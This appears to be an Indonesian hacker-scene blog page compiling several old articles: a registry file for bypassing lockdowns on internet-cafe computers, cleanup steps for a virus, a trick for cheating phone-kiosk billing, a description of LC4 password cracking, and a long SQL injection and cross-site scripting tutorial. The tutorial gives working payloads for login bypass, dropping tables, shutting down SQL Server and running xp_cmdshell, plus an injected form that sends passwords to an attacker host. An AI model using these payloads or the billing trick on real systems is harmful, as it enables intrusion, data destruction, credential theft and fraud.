    ; awal pembuatan kode mengacak-acak registry warnet

    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableRegistryTools"=dword:00000001

    ; sekarang kode buat ngaktifin run
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]

    "NoRun"=dword:00000000
    ;proses selesai
    ----------------------------[ cut here the code
    ]----------------------------- 

    Langkah kedua save kode tersebut dengan ekstensi REG, misalnya  save dengan nama m2love.reg atau terserah anda aja dech,  pokoke ekstensinya harus REG 

    Langkah ketiga cukup klik hasil file yang telah anda simpan  tadi, kemudian lanjutkan dengan langkah keempat.  

    Langkah terakhir reboot komputer anda, tetapi jangan gunakan  telunjuk sakti anda (istillahnya Tri Amperianto). Cukup dengan  menggunakan kombinasi Ctrl+Alt+Del, caranya tekan tombol yang
    bertulisan Ctrl, tahan... jangan dilepas, lalu tekan juga  tombol Alt juga jangan dilepas selanjutnya tombol Delete.
      
    Diharapkan anda tidak jantungan ketika Windows mengeluarkan  popup. Pilih explorer lalu tekan EndTask, tunggu sebentar lalu  akan muncul popup lagi, selanjutnya EndTask-kan lagi. Sekarang klik start lalu run dan ketikkan regedit. Zup... regedit yang manis terbuka dan lakukan apa yang ingin anda lakukan... saran aja, rubah aja RegisterOwner dan Organization dengan nama anda, bukan apa-apa... biasa, pingin terkenal,
    hehehehe... J

    Lalu selanjutnya apalagi… ya selanjutnya anda bisa berkunjung  ke channel kami di #gangcarding on DalNet, situs yang cukup  hangat dibandingkan situs yang berlagak expert tapi kosong dan  sepi, hehehehe…. (promosi) dan jangan lupa buat ngeklik nick  m_beben, nicknya seorang newbie yang manis dan imut… enggak  sombong !!! JJJ

    Kritik dan saran bisa anda kirimkan ke hack_1986@yahoo.com

    Menangani Virus Lohan

    Belakangan ini telah menyebar virus yang cukup liar. Salah satu file yang dibuat oleh virus ini adalah "Queen.ini" yang berhubungan dengan LOHAN. Jadi saya namakan saja virus LOHAN.

    Virus ini cara kerjanya mirip pesin, kalo pembaca belum pernah mendengar virus ini saya akan menjelaskan sedikit mengenai virus pesin. Virus pesin ini akan mengkopi dirinya dengan nama SysTask.exe ke dalam direktori C:\WINDOWS\System32 (atau C:\WINNT\SYSTEM32 - untuk Windows NT/2000). Lalu bila pengguna memasukkan disket ke komputer yang terinfeksi, maka bila ada file word pada disket tersebut akan diganti namanya menjadi ~Temp45.45 dan mengkopi virus ke disket dengan nama macam-macam, seperti "Jangan dibuka.exe" dan lain-lain. Selain itu virus ini akan mematikan regedit.exe

    Nah, virus LOHAN ini juga mengkopi dirinya ke direktori yang sama dengan yang dilakukan virus pesin, dengan nama ssEvtMgr.exe Kelebihan virus ini adalah selain mematikan regedit.exe juga mematikan fungsi Task Manager, sehingga bila pengguna ingin memakai Task Manager, maka komputer akan hang hing hong ;)  Sekarang bagaimana mengatasinya ?

    Virus ini termasuk virus  yang mudah ditanggulangi. Jika OS yang terinfeksi :
    1. Windows 9.x/XP

    • Restart Windows, lalu masuk ke safe mode (dengan memencet F6  atau F8, sewaktu muncul logo Windows)
    • Klik Start -> Run , ketik "command"
    • Lalu ketik "cd c:\windows\system32"
    • Lalu ketik "del ssEvtMgr.exe"
    • Restart kembali windows anda, dan selamat komputer anda  sudah beres
    2. Windows 2000/NT
    • Restart Windows, lalu masuk ke safe mode with command prompt  (dengan memencet F8 sewaktu muncul progress bar)
    • Lalu ketik "cd c:\winnt\system32"
    • Lalu ketik "del ssEvtMgr.exe"
    • Restart kembali windows anda, dan selamat komputer anda  sudah beres
    Satu lagi, kemungkinan virus tersebut menulis sesuatu di registry anda, coba buka regedit anda dan cari string
    ssEvtMgr, jika ada hapus saja (bisa saja tidak dihapus soalnya udah gak ngaruh).

    Demikianlah artikel ini saya tulis, semoga bisa membantu. Jika ada pertanyaan bisa dikirim ke gandhi_mtm@doramail.com

    Meminimalkan Biaya Saat menelpon Di Wartel

    Saya sedikit ingin berbagi pengetahuan, tentang bagai mana cara meminimalkan biaya yang di keluarkan saat kita menelpon di wartel.

    Mungkin juga ada sebagian pembaca yang udah mengetahuinya, ma'af jika menurut anda saya mencontek artikel anda, sedikitpun tak ada niat saya mencontek artikel anda, ini murni hasil percobaan saya atas ketidak sengajaan dalam memencet tombol saat menelpon teman.

    Catatan :
    NeRaKaCreW tidak bertanggung jawab baik secara langsung atau  pun tidak atas akibat yang di timbulkan oleh artikel ini.

    Sebelumnya saya ingin mengatakan bahwa cara ini tidak berlaku  untuk semua wartel. sebelumnya saya jg minta ma'af kepada  bapak/ibu yang bekerja di Telkom n yang merasa di rugikan atas artikel ini, sekali lagi ma'af yang sebesar besarnya.

    Langsung saja.. Ada sebagian wartel yang sudah tidak bisa di "kerjain" dengan cara ini terutama wartel tipe - A cara ini pernah saya gunakan di wartel tipe - B dan Warter
    Mandiri ( empuk banget ). hampir seluruh wartel mandiri bisa dikatakan bisa. saya sudah  mencoba beberapa Wartel dengan cara ini dan hasilnya lumayan banyak wartel yang masih bisa di kerjain. Ok!.. Mulai..

    Anggap saja kita ingin menelpon ke nomor tujuan 0751-461***

    Caranya:
    1. Tekan terlebih dahulu nomor yang di tuju.
    2. Tekan tombol penutup.
    3. lalu tekan tombol radial.
    Loh di mana bedanya nih NeRaKa CreW kan sama aja?
    eit... tunggu dulu...

    Saat lo semua nekan Radial pakai lah sedikit Hormon Kewanitaan lo (perasaan yang sangat mendalam) usahakan saat nomor muncul kembali angka 0 dari nomor tujuan hilang. ex: no tujuan kita tadi 0751-461*** usakan yang keluar di layar nomor tujuan 751-461***

    kalo lo udah tekan radial ga' berhasil juga ngilangin angka 0 (nol/kosong) coba tekan lagi tombol penutup lalu ulangi lagi tekan radial ( kali ini pakai Hormon Ke Ibuan ) sampai angka 0 ilang dari layar.

    Gua udah coba nih NeRaKa CreW, tapi kok nga mau jg?
    gampang aja!... lo tinggal cari Wartel/Target lain ^_*

    NeRaKa CreW dari mana pengaruhnya ada angka 0 dengan tidak sama biaya yang di keluarin saat nelpon?
    hm.. Gini 0 ( berarti di luar daerah ) kalo kita menelpon... kalo nga salah istilah telkomnya interlokal ato apalah.. nga jelas soalnya saya bukan org telkom ^_*nah dengan menghilangkan 0 saat ingin menelpon
    sljj/sli/handphone maka kita tidak di kenai biaya interlokal. biaya yang terprint di wartel hannya jumlah biaya kita menelpon lokal.begitulah kira kira.

    Kalo kita telp dari telp rumah bisa nga?wah.. jalas nga bisa donk.. disini kan kita cuma menipu print-an wartel. jadi sebaiknya jangan coba coba di rumah... karna yang di bohongi cuma print wartel doank, telkom tidak akan tertipu. makanya jangan terlalu sering makenya.. ntar pas tagihan telp wartel tersebut keluar n uang masuk ama biaya rek telp beda orgnya bakal selidiki lo... :D

    ============================

    NeRaKa CreW, gua punya wartel nih... N gua coba cara yang di atas bisa! bagai mana nih cara mengatasinya?..Hm.. gampang saja... Di atas kan bisa kita lihat kalo cara ini bekerja dengan tombol radial.nah kita tinggal me-Non aktivkan saja tombol radial, terserah gimana lo.. semua me-Non Aktivkannya.. ( bisa juga di copot).

    Sekian sedikit trik yang tidak seberapa di Dunia tampa batas ini.

    Saran : sebaiknya anda tidak memperaktekkan cara ini terlalu
    sering sebab "Memakan Daging Bangsa sendiri Itu tidak baik"

    Sekian & Wassalam...

    Membongkar Password Windows Dengan @ stake LC4

    Ada cara cepat menerobos password windows ( termasuk jaringan windows ) saat anda lupa yakni menngunakan @stake LC4 (dulunya bernama L0pht Crack).

    LC4 sanggup melawan mesin windows anda dengan sebuah kombinasi dari kamus dan serangan brutal orang2 usil.LC4 bisa mengcrack hampir semua password dalam hitungan detik saja.bahkan pada password yang terdiri dari angka dan karakter2 panjang.
    Seperti diketahui Password windows Nt,2000,dan juga XP disimpan menggunakan sandi (encrypt) hash marks.LC4 sanggup membongkar hash marks tersebut dengan proses kerja ratusan password per menitnya.selanjtnya,password yang tepat akan dikirim dan ditampilkan ke layar monitor Dalam sebuah perusahaan,LC4 bisa digunakan untuk  mengakses PC karyawan.ia bisa digunakan untuk mengakses
    komputer dari user-user yang lupa dengan  password-nya.maksudnya,System Administrators jaringan bisa  mencari password yang lemah dalam beberapa menit.bahkan  juga,sys admins bisa merubah password tersebut agar lebih aman

    Kejelekan program pembongkar password  ini,seseorang yang usil bisa menggunakan LC4 ini untuk mencium
    (Mengawasi) password2 dari user sebuah jaringan.bahkan,seorang  hacker bisa memasang aplikasi primary domain controller dan  menjegal ratusan password berharga hanya dalam hitungan menit.
    Info dan Download Program LC4beserta versi  evaluasi ini bisa diambil http://www.atstake.com/research/lc/

    Membedah Teknik SQL Injection

    SQL Injection adalah sebuah teknik merubah perintah SQL yang ada untuk memperoleh akses ke data yang dilindungi atau bahkan mengeksekusi perintah yang menyangkut sistem pada suatu webserver.

    Serangan ini mengandalkan rutin validasi input yang tidak dilindungi.

    Seluruh Database merupakan komponen dasar dari aplikasi berbasiskan Web. Hal ini menjadikan website dapat menyimpan data seperti informasi user, rekaman pelanggan, berbagai form isian tertentu.

    Aplikasi web yang interaktif berbasiskan database menggunakan Structured Query Language (SQL) yang secara dinamis berisikan data yang dikostumisasi sesuai kebutuhan user. Hal ini disempurnakan dengan aplikasi yang mengambil input user dan mengombinasikan dengan parameter statis untuk membangun sebuah
    query SQL. Query ini biasanya digunakan untuk memanggil kembali data yang diminta dari database yang kemudian menyajikannya ke hadapan user.

    Model keamanan seperti banyak digunakan pada aplikasi web dengan anggapan bahwa sebuah Query SQL adalah perintah yang dapat dipercaya. Artinya bahwa Query SQL mampu mencegah kendali akses, yang mana harus melalui otentikasi standar dan pemeriksaan otorisasi. Dalam beberapa hal, Query SQL mengijinkan akses ke perintah-perintah tingkat operating sistem pada suatu Host. (Wouuwww!!!)

    Ekploitasi Yang Terjadi

    Beberapa aplikasi yang tidak melakukan validasi dan/atau sanitasi data input user secara benar dapat dieksploitasi dengan beberapa cara:

    Perubahan Nilai-nilai SQL
    • Hubungan Berbagai Statement SQL
    • Menambahkan fungsi pemanggilan dan penyimpanan prosedur ke sebuah statement
    Peranan dan Hubungan pemanggilan data Contoh 
    - Perubahan Nilai-nilai SQLPada program Mysql-Query:

    UPDATE usertable SET pwd='$INPUT[pwd]' WHERE uid='$INPUT[uid]';

    Pengaksesan melalui Browser:
    http://www.target.com/script?pwd=ngomo&uid=1'+or+uid+like'%25admin%25';--

    Contoh - Menghubungkan berbagai SQL Statement
    Pada program PostgreSql-Query:

    SELECT id,name FROM products WHERE id LIKE '%$INPUT[prod]%';

    Pengaksesan melalui Browser:
    http://www.target.com/script?0';insert+into+pg_shadow+usename+values+('hoschi');--
    Contoh - Menambahkan fungsi calls dan stored-procedures ke sebuah statement Pada program MS SQL-Query:

    SELECT id,name FROM products WHERE id LIKE '%$INPUT[prod]%';

    Pengaksesan melalui Browser:
    http://www.target.com/script?0';EXEC+master..xp_cmdshell(cmd.exe+/c);--

    Contoh - Peranan dan Hubungan pemanggilan data Pada Program DB2-Query:

    SELECT id,t_nr,x_nr,i_name,last_update,size FROM p_table WHERE  size = '$INPUT[size]';

    Pengaksesan melalui Browser:
    http://www.target.com/script?size=0'+union+select+'1','1','1',concat(uname||'-'|| passwd)+as+i_name+'1'+'1'+from+usertable+where+uname+like+'25

    Beberapa Contoh Ekploitasi pada SQL Server :
    Contoh #1 
    Microsoft SQL Server memiliki dialek tersendiri dalam SQL, yang mana menggunakan Transact SQL (TSQL). Dalam hal ini kita dapat mengekploitasi kehebatan dari TSQL dengan beberapa cara sekedar untuk menunjukkan cara kerja SQL Injection. Perhatikan query berikut ini, yang berbasiskan suatu table user :

    select userName from users where userName='' having 1=1

    Jika Anda adalah seorang programmer SQL yang mahir, maka andaakan menyadari bahwa query ini menimbulkan suatu error. Kita dapat dengan mudah membuat halaman login.asp suatu database sasaran, yang menggunakan pengecekan login berikut:

    Username: ' having 1=1 –-
    Password: [sembarang]

    Sewaktu Anda mengclick tombol Submit untuk memulai proses login, query SQL menyebabkan script ASP menampilkan pesan berikut ini ke browser:

    Microsoft OLE DB Provider for SQL Server (0x80040E14) Column 'users.userName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /login.asp, line 16

    Wah wah. Hal ini terlihat pada pesan kesalahan yang mengatakanbahwa user tidak terotorisasi (tidak berhak) terdapat satu field dari database yang dicoba untuk divalidasi. users.username. Dengan menggunakan nama field ini, kita sekarang dapat menggunakan kata kuncinya SQL Server untuk login sebagai berikut:

    Username: ' or users.userName like 'a%' –-
    Password: [Sembarang]

    sekali lagi, hal ini menghasilkan sebuah query SQL terinjeksi
    yang ditampilkan terhadap table user tersebut.

    select userName from users where userName='' or users.userName
    like 'a%' --' and userPass=''

    Mengingat kembali saat kita membuat table user, kita juga membuatkan seorang user yang field username sebagai admin dan field userpass password. Log in dengan username dan password seperti yang ditunjukkan diatas menggunakan kata kunci SQL query untuk mendapatkan username, query tersebut menangkap field username pada baris pertama yang field username-nya dimulai dengan huruf a, yang bisa jadi adalah admin:

    Logged In As admin
    Selamat login sebagai admin dech. (hehehe)

    Contoh #2
    SQL Server diantara database yang lain nya memisahkan query dengan sebuah semi- colon. Mengguankan sebuah semi-colon mengijinkan beberapa query untuk dikirimkan sebagai satu paket dan dieksekusi secara bergantian, sebagai contoh:

    select 1; select 1+2; select 1+3;
    ... akan mengembalikan tiga recordset. Pertama berisikan nilai 1, kedua berisikan nilai 3, dan ketiga berisikan nilai 4 dst. Jadi, jika kita login dengan validasi berikut ini:

    Username: ' or 1=1; drop table users; --
    Password: [sembarang]

    Kemudian query akan mengeksekusi dalam dua bagian. Pertama, akan memilih field username untuk slmuar baris dalam table user. Kedua, akan menghapus table user, hal ini berarti dilain waktu kita login, kita akan melihat error berikut ini:

    Microsoft OLE DB Provider for SQL Server (0x80040E37)
    Invalid object name 'users'.
    /login.asp, line 16

    Contoh #3
    Contoh terakhir sehubungan dengan form login yang akan kita diskusikan adalah mengenai eksekusi dari perintah khusus TSQL dan ESP (Extended Stored Procedures) atau prosedur penyimpanan yang diperluas. Banyak situs yang menggunakan user account sistem default, yang sewaktu login ke SQL Server dari script
    ASP mereka atau aplikasi lainnya. Secara default, user ini mengakses ke seluruh perintah dan dapat menghapus, mengganti nama dan menambahkan database, tabel, eksekusi program dsb.

    Satu dari perintah SQL Server yang tergolong "Powerful" adalah SHUTDOWN WITH NOWAIT, yang akan menyebabkan SQL Server mati, menghentikan Windows Service. Untuk merestart SQL Server setelah perintah ini adalah perkara yang tidak mudah, Anda harus menggunakan SQL service manager atau beberapa metode lain dari proses restart SQL Server.

    Sekali lagi, perintah ini dapat dieksploitasi dengan contoh login dibawah ini:

    Username: '; shutdown with nowait; --
    Password: [Sembarang]

    menyebabkan script login.asp menjalankan query berikut ini:
    select userName from users where userName=''; shutdown with nowait; --' and userPass=''

    Jika user di set sebagai account sistem default, atau user memiliki hak istimewa, kemudian SQL server akan men shut down dan akan meminta sebuah start up sebelum akhirnya berfungsi lagi.

    SQL Server juga termasuk beberapa ESP, yang mana berbasiskan khusus DLL C++ yang dapat berisi kode C/C++ untuk mamanipulasi command prompt, dsb. Seluruh ESP berada dibawah database master dan memiliki awalan "xp_".

    Terdapat beberapa ESP yang dapat menyebabkan kerusakan fatal pada suatu sistem, dan dengan menggunakan form login dengan sebuah perintah terinjeksi sebagai username seperti dibawah ini:

    Username: '; exec master..xp_xxx; --
    Password: [Sembarang]

    Kita dapat mengeksekusi ESP. Semua yang kita harus lakukan adalah mengambil ESP yang sesuai dan mengganti xp_xxx dengan nama dalam contoh diatas. ebagai contoh, jika IIS terinstal pada mesin yang sama dengan SQL Server, kemudian ktia akan merestartnya menggunakan ESP xp_cmdshell (dalam hal ini
    mengeksekusi string perintah sebagai suatu perintah untuk Operating System) dan me reset IIS. Semua yang kita perlu lakukan hanyalah memasukkan validasi user pada halamanlogin.asp:

    Username: '; exec master..xp_cmdshell 'iisreset'; --
    Password: [Sembarang]

    login ini akan mengirimkan query ke SQL server seperti berikut:
    select userName from users where userName=''; exec master..xp_cmdshell 'iisreset'; --' and userPass=''
    Seperti yang saya dan Anda duga, hal ini menyebabkan kerusakanserius dan dengan perintah yang sesuai dapat menyebabkan situs korban tidak berfungsi.

    Contoh #4
    OK, waktunya beralih dari melihat script login.asp dan sekarang menuju metode lain yang umum untuk menampilkan suatu serangan SQL injection.Betapa banyak waktu yang sudah Anda habiskan untuk sebuah
    situs yang menjual suatu barang dan melihat URL seperti ini:

    www.situsgue.com/products.asp?productId=2
    Dengan jelas terlihat angka 2 adalah ID dari produk, dan banyak situs yang secara sederhana akan membuat query pada variabel querystring ProductID, sebagai berikut:
    select prodName from products where id = 2

    Sebelum kita lanjutkan, anggaplah kita mempunyai setup table
    dan baris pada SQL Server:
    create table products
    (
    id int identity(1,1) not null,
    prodName varchar(50) not null,
    )
    insert into products(prodName) values('Chike Bum Bum')
    insert into products(prodName) values('Topi Cap Kadal')
    insert into products(prodName) values('Celana Cap Buaya')

    Misalkan juga bahwa ktia membuat setup script ASP bernama products.asp:

    (% dim prodId prodId = Request.QueryString("productId") set conn = server.createObject("ADODB.Connection") set rs = server.createObject("ADODB.Recordset") query = "select prodName from products where id = " & prodId conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=myDB; User Id=sa; Password=" rs.activeConnection = conn rs.open query if not rs.eof then response.write "Got product " & rs.fields("prodName").value else response.write "Barang tidak ditemukan" end if %)

    Jadi jika kita melihat product.asp pada browser akan tampil
    URL berikut:

    http://www.situsgue.com/products.asp?productId=1

    ... kemudian kita akan melihat baris lanjutan dari teks pada browser

    Got product Chike Bum Bum

    Adanya pemberitahuan ini bahwa product.asp mengembalikan sebuah field dari recordset berdasarkan pada nama field:

    response.write "Got product " & rs.fields("prodName").value

    Walaupun terlihat lebih secure, sebenarnya tidak, dan kita masih dapat memanipulasi database tersebut, hanya berbekal tiga contoh diatas. Pemberitahuan produk diatas berdasarkan pada sebuah nilai numerik:

    query = "select prodName from products where id = " & prodId

    Halaman products.asp untuk pemesanan barang berfungsi secara benar, semuanya meminta nomor ID produk yang dijalankan sebagai variabel querystring productId. Hal inipun tidak terlalu menimbulkan masalah. Perhatikan URL berikut ini pada product.asp:

    http://www.situsgue.com/products.asp?productId=0%20or%201=1

    Adapun %20 dalam URL diatas mewakili sebuah URL-encode dari
    karakter spasi, jadi URL yang sebenarnya terlihat seperti ini:

    http://www.situsgue.com/products.asp?productId=0 or 1=1

    Dengan bantuan halaman product.asp, query akan terlihat seperti ini:

    select prodName from products where id = 0 or 1=1

    Menggunakan secuil informasi diatas, mengetahui cara kerjanya dan beberapa URL-encoding, kita dapat saja dengan mudah mengambil nama field products dari tabel products tersebut. Seperti dibawah ini:

    http://www.situsgue.com/products.asp?productId=0%20having%201=1

    Hal ini akan menyebabkan error pada browser sebagai berikut:

    Microsoft OLE DB Provider for SQL Server (0x80040E14) Column 'products.prodName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /products.asp, line 13
    Nah, sekarang kita dapat mengambil nama field dari products (products.prodName) dan memanggil URL berikut ini pada browser:

    http://localhost/products.asp?productId=0;insert%20into%20products(prodName)%20values(left(@@version,50))

    disinilah query tanpa URL-encoded spasi:
    http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50))

    Semestinya menampilkan pesan "No product found", bagaimanapun juga pesan ini dijalankan oleh suatu query INSERT pada tabel product, yang menambahkan 50 karakter pertama dari variabel @@version SQL server (yang berisikan detil dari versi SQL Server dsb.)

    Dalam situasi sebenarnya, Anda akan menghadapi danmengeksploitasi tabel product lebih dari hal diatas, yang bisa saja memiliki selusin field yagn lain. Sekali lagi biarpun hal itu terjadi metode ini masih akan menghasilkan hal yang sama.

    Untuk mendapatkan versi SQL Server, adalah hal yang mudah terjadi saat pemanggilan halaman products.asp dengan nilai masukan terakhir dalam tabel products. Seperti dibawah ini:

    http://localhost/products.asp?productId=(select%20max(id)%20from%20products)

    Apa yang query lakukan ini adalah menangkap ID dari baris akhir yang ditambahkan ke table products menggunakan fungsi statistik MAX dalam SQL Server. Menghasilkan baris baru yang berisikan rincian versi SQL Server:

    Got product Microsoft SQL Server 2000 - 8.00.534 (Intel X86)

    Teknik Cross Site Scripting?Cross Site Scripting adalah sebuah teknik serangan yang dijalankan saat sebuaH situs menampilkan user input pada browser yang tidak terdapat sanitasi data.

    Kembali ke masalah username/password, field username biasanyaberisikan karakter alphanumerik. Penting sekali, nilai username/password berisikan tanda petik ('). Sebagai bagian dari proses sanitasi data dan memastikan bahwa user memasukkan karakter yang valid. Keharusan bahwa mengisi username dan password untuk mengakses database tidak berisikan karakter yang cacat, dapat melindungi database Anda dari serangan SQL Injection.

    Vulnerabilitas yang terjadi sewaktu sebuah website menampilkan input user pada browser yang tidak memiliki sanitasi data. Cross Site Scripting biasanya dapat mencuri cookies, melakukan pengujian integritas data, dan menipu user untuk mengirimkan informasinya ke seorang hacker.

    Alihkan perhatian Anda kembali ke contoh halaman Login yang kita uji sebelumnya dalam artikel ini. Bayangkan bahwa sistem login ini terdiri dari dua halaman, Pertama: Login.asp, yang berfungsi menampilkan form untuk user memasukkan username dan password mereka. Sedangkan yang Kedua: CekUser.asp, yang
    bertugas memeriksa apakah username yang mereka masukkan tersebut valid atau tidak. Dalam kasus jika pengecekan username/password terjadi invalid, maka CekUser.asp menggunakan perintah Response. Redirect yang mengembalikan user ke halaman login.asp lagi, adapun string yang menampilkan pesan kesalahan seperti berikut:


    CekUser.asp
    If rs.eof then
    'login username/password invalid
    Response.Redirect("Login.asp?errorMessage=Invalid+username+or+password")
    Else
    'login sukses...
    End If

    Kemudian, pada Login.asp, Pesan kesalahan nilai querystring akan ditampilkan sebagai berikut:
    teks yang berwarna merah jgn dicopy 
    jika anda mengkopi script dibawah ini ganti tanda (  ) dengan tanda < > agar terbaca
    Login.asp
                      (form method="POST" action="CekUser.asp")
                      (!-- Tampilkan pesan kesalahan --)
                      (%=request.querystring("errorMessage")%)

                      Username: (input type="text" name="UserName")(br)
                      Password: (input type="password" name="Password")(br)
                      (input type="submit" name="submit" value="log in!")
                      (/form)


    Teknik pemrograman ini sangat tidak aman, jika user berusaha login secara invalid, mereka akan kembali ke halaman Login.asp dan ditampilkan sebuah pesan pendek yang menjelaskan bahwa login yang mereka adalah invalid. Namun bagi seorang hacker yang berpengalaman, hal ini dapat menyatakan bahwa dia dapat saja merubah kode HTML yang sesungguhnya dari halaman yang menampilkan pesan kesalahan tersebut. Sebagai contoh, dia melakukan login menggunakan url berikut ini:

    http://www.namadomain.com/Login.asp?errorMessage=

    (penulis: Definisi Hax0r silakan dilihat
    http://www.urbandictionary.com/pickup.php/1521/d9878c )

    Sebagaimana yang ktia lihat pada kode pada halaman login.asp,
    nilai querystring pada pesan kesalahan akan diperlihatkan,
    menjadikan sebuah halaman HTML dengan nilai seperti ini:

    teks yang berwarna merah jgn dicopy 
    jika anda mengkopi script dibawah ini ganti tanda (  ) dengan tanda < > agar terbaca

     Login.asp
                      (form method="POST" action="admin_menu.asp")
                      (/form)(form method="POST"
                      action="http://www.hax0r.com/stealPassword.asp")

                      Username: (input type="text" name="UserName")(br)
                      Password: (input type="password" name="Password")(br)

                      (input type="submit" name="submit" value="log in!")
                      (/form)
    Sang Hacker dengan sangat pandainya memasukkan beberapa kode HTML ke halaman ini hingga datanglah seorang user yang rada-rada lugu (atau pura-pura lugu) mengunjungi halaman yang terdapat nilai querystring pesan kesalahan, user ini memasukkan username dan password yang secara otomatis dikirimkan ke halaman http://www.hax0r.com/stealPassword.asp.

    Sekarang, Sang hacker dapat mengirimkan sebuah link untuk membuat halaman via sebuah pesan email atau sebuah link dari beberapa situs forum diskusi atau apa sajalah, mengharapkan ada seorang user dari situs ini akan mengklik klik dan mencoba untuk login. Tentu saja, pada saat login, user tersebut akan mengirimkan data ke situs sang hacker. (Tepatnya terjadi Encoding dari nilai querystring yang menampilkan pesan kesalahan akan menjadi seperti ini:

    http://www.namadomain.com/login.asp?errormsg=%3C%2Fform%3E%3Cform+method%3D%22POST%22+action%3D%22http://www%2Ehax0r%2Ecom%2FstealPassword%2Easp%22%3E.)

    Sang hacker akan keluar menjadi "pemenang". Jika dia menemukan seseorang yang tertipu oleh teknik ini, Klik linknya, kunjungi situs tertentu untuk login, namun informasi username/password akan terkirim ke situs Sang hacker. :(


    Bagaimana cara melindungi data dari Cross Site Scripting? Melindungi data terhadap suatu serangan Cross Site Scripting  relatif sederhana : yaitu menggunakan metode
    Server.HtmlEncode. Metode ini akan mengambil suatu string dan  mengganti karakter apapun yang browser coba  menginterpretasikannya dengan HTML encoding, jadi pada browser akan tercetak berbagai karakter ke layar. Perhatikan contoh dibawah ini:

    Akan menghasilkan string berikut ini:

     (/form)(form method="POST"

      action="www.hax0r.com/passwordstealer.asp")

    Untuk mengubah kode asli tentunya menggunakan HTML encoding, kita memerlukan perubahan pada baris pesan yang mencetak nilai dari errorMessage dari:

    (%=request.querystring("errorMessage")%) menjadi (%=server.htmlencode(request.querystring("errormsg"))%)

    Sekali lagi, sanitasi data yang lintas-balik ke browser seharusnya melakukannya untuk seluruh data yang telah dilalui dari sumber yang tidak aman (user). Kita seharusnya juga men-sanitasi seluruh data yang datang dari berbagai sumber dan lintas-balik ke browser. Jika Anda seorang hacker tentunya dapat saja masuk dan merusak database/file system, memasukkan kode ke record/file yang absah, mengkompromikan situs tersebut dengan berbagai cara. Anda benar-benar seorang hacker sejati. Hmm... Seperti yang didefinisikan,

    Hacker adalah programmer terampil yang sanggup melakukan pemrograman setiap harinya, menggunakan pengetahuannya dengan tepat. Seperti siluman dapat memasuki sistem tanpa diketahui tanpa menghancurkan sebab tetap memperhatikan kode etik yang ada. OK?

    Lubang Keamanan yang sering terjadi pada sistem database populer:

    MySQL
    • Mendukung 'INTO OUTFILE'
    • Sering dijalankan sebagai "root"
    • Banyak modul dan library tidak mendukung multiple-statements.
    Oracle
    • Memungkinkan Subselects
    • Memungkinkan UNION
    • Banyak menyimpan prosedur
    • Tidak mendukung multiple-statements
    DB2
    • Memungkinkan Subselects
    • Memungkinkan UNION
    • Banyak Menyimpan prosedur
    • Tidak mendukung multiple-statements
    Postgres
    • Mendukung perintah COPY (bila dijalankan sebagai superusermode)
    • Memungkinkan Subselects
    • Memungkinkan UNION
    • Banyak menyimpan prosedure
    • Mendukung Multiple-statements
    MS SQL
    • Memungkinkan Subselects
    • Memungkinkan UNION
    • Banyak menyimpan prosedure
    • Mendukung Multiple-statements
    • Banyak menyimpan prosedur default yang berbahaya (xp_cmdshell, sp_adduser)
    Saya cukupkan saja sampai disini dulu karena artikelnya sudah terlalu panjang. Walaupun masih terdapat beberapa teknik eksploitasi dan solusinya yang akan saya jelaskan pada kesempatan lainnya. Wassalam.

    Dibuat oleh:

    si_cebol @ yahoo.com
    www.situs.newbie.at

     
    Support : Creating Website | Tutorq Template | Template
    Copyright © 2011. FAROUQ'S - All Rights Reserved
    Template Modify by Creating Website
    Proudly powered by Blogger